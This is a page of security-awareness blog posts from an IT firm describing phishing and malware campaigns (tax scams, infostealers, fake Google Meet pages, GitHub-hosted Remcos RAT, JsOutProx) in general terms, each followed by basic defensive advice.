Cybercriminals Exploit Tax Season: Stay Alert to Scams

AHKBot, BruteRatel C4, GULoader, Install Patches, malicious emails, malicious sites, Ophtek, Phishing Email, Tax Scams, Update Software, , , , , , , ,
10
Apr 2025

Cybercriminals are exploiting the urgency of tax season to launch phishing scams aimed at stealing personal and financial data.

Once again, the tax filing deadline is fast approaching for Americans and cybercriminals are preparing to take advantage of this seasonal chaos. Microsoft has recently issued a warning about a surge in tax-themed phishing campaigns targeting both individuals and businesses. These scams are designed to look convincing – often replicating official communications from the IRS or trusted tax companies– and are very successful at tricking people into revealing sensitive data or installing malware.

Luckily, Ophtek has your back and we’re here to give you some advice on how you can stay safe.

Understanding Tax-Related Phishing Scams

At the core of these scams are phishing emails which use urgency and fear to catch victims off guard and cause them to commit an action. The emails may, for example, claim there’s a problem with your tax filing, warn of an audit, or promise that a tax refund is due. These emails often contain subject names such as “EMPLOYEE TAX REFUND REPORT” or “Tax Strategy Update Campaign Goals” which, once opened, can install malicious software.

Typically, the emails also contain PDF attachments – with names such as lrs_Verification_Form_1773.pdf – which are used to redirect users to malicious website containing malware. In certain cases, the emails also include links or QR codes that redirect users to fake websites made to resemble genuine tax portals. The goal is simple: get users to enter their personal or financial details or download malware.

But not all of these phishing emails are easily identifiable as threatening or suspicious. Some start with relatively harmless messages to build trust. Once the target feels comfortable, follow-up emails are used to introduce more dangerous content. This makes it more likely the user will activate a malicious payload compared to an email received out of the blue. A wide range of malware has been observed in these attacks with GuLoader, AHKBot, and BruteRatel C4 just a few of those involved.

Protect Your Finances and Your Tax Returns

The financial and personal impact of these attacks can be significant for victims. As well as the potential financial loss, those affected often face further headaches in the form of frozen credit, blacklisting, and stolen tax refunds. For businesses, the consequences can extend to data breaches, costly compliance violations, and significant downtime. Accordingly, you need to tread carefully during tax season and make sure you follow these best practices:

  • Verify Email Authenticity: It’s crucial that you check the authenticity of all emails you receive, especially those which call for an urgent action to be performed. Always check the email address of emails received and make sure they’re not using an unusual domain spelling e.g. I-R-S@tax0ffice.com
  • Be Careful of Attachments and Links: Never open attachments from unknown sources as these could easily contain malware. Likewise, be careful when dealing with links – hover your mouse cursor over any suspicious links to reveal the genuine destination and Google the true URLs to identify any potential threat.
  • Keep Your Software Updated: Finally, make sure that your software is always up-to-date and has the latest security patches installed. This can strengthen your cyber defenses and make it much harder for threat actors to take advantage of software vulnerabilities.

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More

Infostealers: What They Are and How to Stay Protected

Infostealers, malicious sites, malware, Ophtek, Phishing Email, SambaSpy, security software, SnipBot, software updates, , , , , , , ,
03
Dec 2024

Infostealer malware is frequently referenced as the go-to weapon for threat actors, but what is it? And how do you protect your IT systems from it?

You only have to take a quick look over the Ophtek blog to understand the popularity of infostealers in modern hacking. From fake Zoom sites through to SnipBot and SambaSpy, threat actors are determined to get their hands on your sensitive data. Infostealers, therefore, present an everyday threat to PC users and it’s crucial you understand their methods and impact.

Luckily, Ophtek has your back, and we’re going to take a deep dive into infostealers to equip you with the knowledge you need to stay safe.

What is an Infostealer?

The main objective of all infostealer malware is to harvest confidential data from a compromised system. With this stolen data, threat actors have the opportunity to conduct numerous crimes such as identity theft or financial damage. This makes infostealer malware such a serious threat, especially in the age of big data, where organizations hold huge amounts of data on their IT systems. As with most modern malware, infostealer has strong stealth capabilities, allowing it to operate in the background without being detected and strengthening its impact.

The Danger Behind Infostealers

Infostealers can be individual malware threats or part of a more extensive suite of malware applications. Whatever their method, infostealers tend to focus on stealing the following data:

  • System login credentials
  • Social media and email passwords
  • Bank details
  • Personal details

All of these data categories have the potential for serious damage e.g. hacking someone’s personal emails and reading confidential information or clearing someone’s bank account out. From a business perspective, infostealers also have the potential to gain access to secure areas of your IT infrastructure and compromise the operations of your business. All of this data is taken directly from your servers and then discreetly transmitted to a remote server set up by the threat actors.

How Do Infostealers Strike?

Threat actors have developed numerous strategies to launch successful infostealer attacks with the two most common methods being:

Protecting Your Systems Against Infostealers

Despite the threat of infostealers, it’s relatively easy to stay safe and protect your systems from them. All you need to do is follow these best practices:

  • Be Wary of Suspicious Emails: Any emails which ring even the slightest alarm bell should be closely scrutinized. If something about the wording doesn’t sound quite right, or there’s a sense of urgency to commit to an action, the chances are that this could be a phishing email. In these instances, don’t click anything and, instead, contact an IT professional to review the content.
  • Always Update Your Software: One of the easiest ways for threat actors to deploy infostealers on your system is through software vulnerabilities. No piece of software is perfect, and they often contain weak spots which can be exploited. However, as these vulnerabilities are picked up by the developers, security patches are issued to remedy these weak spots. Accordingly, installing these updates should be a major priority.
  • Install Security Software: There are numerous security packages available such as AVG and Kaspersky which monitor your systems in real time and can block malware threats instantly. This automatic defense enables you to stay safe from infostealers and keeps your networks healthy and productive.

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More

Fake Google Meet Pages Used to Spread Malware

Chrome, ClickFix, DarkGate, Facebook, Google, Google Meet, Lumma Stealer, malware, Ophtek, Phishing Email, , , , , , , , ,
12
Nov 2024

Hackers have designed fake Google Meet error pages to distribute info-stealing malware which can compromise all the data on a network.

It feels as though malicious websites are springing up on a daily basis, and with 12.8 million websites infected with malware, this is a fair assumption to make. The latest attack under the Ophtek spotlight centers around Google Meet, a videoconferencing service hosted online by Google. The threat uses fake connectivity errors to lure victims into inadvertently launching the malware on their own system. And with Google Meet having over 300 million active users every month, the chance of this campaign tripping people up is exceptionally high.

The Danger of Fake Google Meet Pages

Google Meet attack appears to be part of a wider hacking campaign known as ClickFix, which has also been identified using similar fake websites impersonating Google Chrome and Facebook. In all these cases, the objective of the campaign is to install info stealers onto infected PCs. Malware used in these attacks include DarkGate and Lumma Stealer.

Fake error messages are displayed in the web browsers of victims to indicate a connectivity issue with a Google Meet call. However, there is no Google Meet call taking place, it’s simply a ruse to deceive victims into following through on a malicious call-to-action. These ‘errors’ recommend copying a ‘fix’ and then running it in Windows PowerShell, an app commonly used to automate processes on a Microsoft system.

Unfortunately, rather than fixing the ‘error’ with Google Meet, the execution of this code within PowerShell simply downloads and installs the malware. Once installed, malware such as DarkGate and Lumma Stealer has the potential to search out sensitive data on your network, establish remote network connections, and transmit stolen data out of your network.

Victims are redirected to these malicious websites via phishing emails, which claim to contain instructions for joining important virtual meetings and webinars. The URLs used within the emails appear like genuine Google Meet links but take advantage of slight differences in the address to deceive recipients.

Protecting Yourself from Fake Google Meet Malware

The best way to stay safe in the face of the fake Google Meet pages (and similar attacks) is by being proactive and educating your staff on the threats of malicious websites. Accordingly, following these best practices gives you the best chance of securing your IT infrastructure:

  • Double Check URLs: malicious websites often mimic genuine ones to catch people off guard. Therefore, always verify any URL for anything unusual such as misspelled words or lengthened and unusual domain endings, before clicking them. This will minimize your risk of falling victim to phishing and malware attacks.
  • Use Browser Security Features: many browsers, such as Google Chrome, come with built-in security features which can block sites known to be harmful or detect suspicious downloads. If you have these protections enabled, and this is easily done through your browser settings, you can rest assured you’re putting a strong security measure in place.
  • Install Antivirus and Firewall Software: one of the simplest way to protect yourself is by installing antivirus and firewall software, which is often available for free in the form of AVG and Kaspersky. This software can not only detect malware, but also block it before it reaches your system, so it can be considered a very strong form of defense.

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More

Infected GitHub Links Target Financial Services

GitHub, online links, Ophtek, Phishing Email, Remcos RAT, Remote Access Trojan, security software, , , , , ,
05
Nov 2024

A new malware campaign, targeting finance and insurance sectors, is using infected GitHub repositories to distribute the Remcos remote access trojan (RAT).

GitHub is an online platform which allows software developers to store and share code online. It’s like an online hard drive, but one which is specifically dedicated to coding projects. It’s main use is to foster collaboration between developers and track changes in their code as it evolves. However, as it’s a trusted source, it makes it the perfect target for hackers. On this occasion, the threat actors haven’t been starting malicious repositories. Instead, they’ve been taking advantage of the comments section in legitimate repositories.

The Dangers of GitHub Comments

The GitHub attack in question appears to be targeting genuine open-source repositories, with those affected including HMRC, Inland Revenue, and UsTaxes. These are well-known and trusted repositories. Users wouldn’t expect to be infected by malware visiting these, whereas lesser known and newer repositories pose more of an obvious risk. So, how are the threat actors compromising these accounts? Well, they’re uploading malware files into the comments section.

Although the comment is deleted, the link to file stays in place. Phishing emails are then used to redirect users to the infected link on GitHub. Again, as GitHub is a genuine, trusted platform, these phishing emails are not detected as being suspicious. This puts the recipient at risk of unknowingly downloading and executing the Remcos RAT. This RAT allows threat actors to remotely take control of an infected PC. From here, they can steal your data, execute further commands on your system, and monitor all your activity. This makes the attack highly dangerous and follows in the footsteps of numerous GitHub attacks in the last year.

Staying Safe from Malicious Comments

Your employees may not have anything to do with software development, but the Remcos RAT relies on phishing techniques which could easily deceive them. Therefore, you need to ensure your employees stay safe from this innovative threat. The best way to achieve this is by following these best practices:

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More

Financial Firms Targeted by JsOutProx Malware

JavaScript Malware, JsOutProx Malware, malicious code, Ophtek, Phishing Email, ScriptSafe for Chrome, , , , ,
07
May 2024

A new phishing campaign, launched in March 2024, has been targeting financial firms all over the world with the JsOutProx banking trojan.

The JsOutProx malware campaign was first detected by Visa, with their Payment Fraud Disruption team sending out security alerts to stakeholders about the threat. So far, the targets of the attack have been based in Africa, South Asia, and the Middle East. The identity of the threat actors behind the attack are currently unknown, but it’s speculated they may be China-based or receiving support from China.

Financial malware always has the potential to cause great damage to organizations and individuals, so it’s important you understand the threat posed by JsOutProx.

The Lowdown on JsOutProx

First detected online in 2019, JsOutProx provides remote access to infected PCs by way of a JavaScript backdoor. This foothold allows threat actors to carry out numerous malicious attacks within the infected system. These include downloading further malware, data harvesting, taking screenshots, executing files, and embedding itself deep within the target. Plugins are utilized to launch these attack methods, an indicator this is a sophisticated piece of malware.

JsOutProx relies on JavaScript to carry out its attacks, and this method has been employed to deceive targets. Whereas many PC users understand the threat of a specific file type – such as a Word document or .exe file – they’re less likely to have knowledge of the threat posed by JavaScript code. Additionally, JavaScript coding is unintelligible to many anti-malware tools, so it has the potential to go undetected by software expected to keep PCs secure.

How is the JsOutProx Attack Launched?

Using phishing email techniques, JsOutProx is distributed through emails purporting to be related to MoneyGram or SWIFT payment notifications. However, far from being from genuine financial institutions, the senders behind these emails only have malicious intentions. Once recipients have fallen for the bait in the phishing emails, the JsOutProx code is activated and allows the threat actors to position themselves within the infected PC. Once installed, JsOutProx adopts a number of functionalities to enhance its position, such as changing DNS settings, editing proxy settings, and bypassing User Account Control detection.

Protect Your PCs from JsOutProx

A significant proportion of internet users have access to online banking services, and this is why JsOutProx has maximized its chances of snaring victims. Thankfully, you don’t have to fall victim to JsOutProx and compromise the security of your PC. All you have to do is make sure you practice the following:

  • Protect your browsers from scripts: many malware attacks such as JsOutProx rely on scripts to launch their attack within browsers. Therefore, it makes sense to protect your browsers from malicious scripts. Luckily, this is a relatively simple task thanks to ready-made browser plugins such as ScriptSafe for Chrome. These browser extensions protect you by blocking unwanted content and providing alerts against blacklisted sites which are malicious.

For more ways to secure and optimize your business technology, contact your local IT professionals.

Read More
1 2 3 5